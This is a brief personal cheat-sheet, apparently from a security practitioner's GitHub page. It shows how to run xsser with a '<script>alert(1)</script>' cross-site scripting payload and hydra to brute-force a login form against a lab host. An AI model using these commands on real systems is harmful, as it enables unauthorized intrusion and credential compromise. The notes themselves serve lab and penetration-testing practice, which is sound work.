rootđź’€bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

Using xsser for crosssite scripting

xsser --url "http://10.10.10.10/index.php?page=dns-lookup.php" -p "target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS"

This “target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS” was gotten from burpsuite, more like the payload. So, the payload determines how it is constructed

To run a custom payload

xsser --url "http://10.10.10.10/index.php?page=dns-lookup.php" -p "target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS" --Fp "<script>alert(1)</script>"

You can just test this manually lool

Check login pages for xss also

Using hydra to bruteforce login pages

hydra -L users.txt -P pass.txt http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"

All these were gotten from the source code of the webpage or you can just capture the login request on burp then copy it. I’ll still prefer using burp intruder lool